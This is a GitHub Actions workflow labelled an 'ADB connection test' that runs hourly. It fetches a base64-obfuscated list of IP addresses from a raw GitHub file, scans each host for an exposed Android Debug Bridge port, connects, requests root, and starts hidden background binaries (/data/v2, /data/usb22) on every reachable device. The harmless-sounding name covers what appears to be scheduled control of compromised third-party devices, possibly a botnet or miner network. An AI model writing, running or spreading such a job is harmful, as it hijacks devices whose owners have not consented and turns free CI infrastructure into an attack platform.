name: ADB Connection Test

on:
  schedule:
    - cron: '0 * * * *' # 每小时运行一次
  workflow_dispatch: # 手动触发

jobs:
  adb-test:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout the repository
      uses: actions/checkout@v2

    - name: Install Telnet and ADB
      run: |
        sudo apt-get update
        sudo apt-get install -y telnet adb curl

    - name: Download the 1.txt file from URL
      id: download_file
      run: |
        curl -o 1.txt https://raw.githubusercontent.com/Janit8r/device_lge_judyln/S/1.txt

    - name: Decode IPs from 1.txt (Base64)
      id: decode_ips
      run: |
        # 将1.txt文件中的每一行逐个解码并存储为一个变量
        while IFS= read -r line; do
          DECODED_IP=$(echo "$line" | base64 --decode)
          echo "$DECODED_IP" >> decoded_ips.txt
        done < 1.txt

    - name: Test ports and run ADB commands
      run: |
        # 逐行读取解码后的 IP 并测试端口连通性
        while IFS= read -r ip; do
          echo "Testing IP: $ip"
          
          # 测试7500端口连通性
          if timeout 5 telnet "$ip" 7500 </dev/null 2>&1 | grep -q "Connected"; then
            echo "$ip:7500 is open, skipping to next IP."
            continue
          else
            echo "$ip:7500 is not open, testing 5555..."

            # 测试5555端口连通性
            if timeout 5 telnet "$ip" 5555 </dev/null 2>&1 | grep -q "Connected"; then
              echo "$ip:5555 is open, connecting via ADB..."
              
              # 使用 ADB 连接，并运行命令
              adb connect "$ip:5555"
              adb root
              adb -s "$ip:5555" shell 'sh -c "/data/v2 run > /dev/null 2> /data/error.log &"'
              adb -s "$ip:5555" shell 'sh -c "/data/usb22 -c /data/logfile > /dev/null 2> /data/error.log &"'
              adb disconnect "$ip:5555"
              echo "Commands executed on $ip:5555"
            else
              echo "$ip:5555 is not reachable within 5 seconds, skipping."
            fi
          fi
        done < decoded_ips.txt
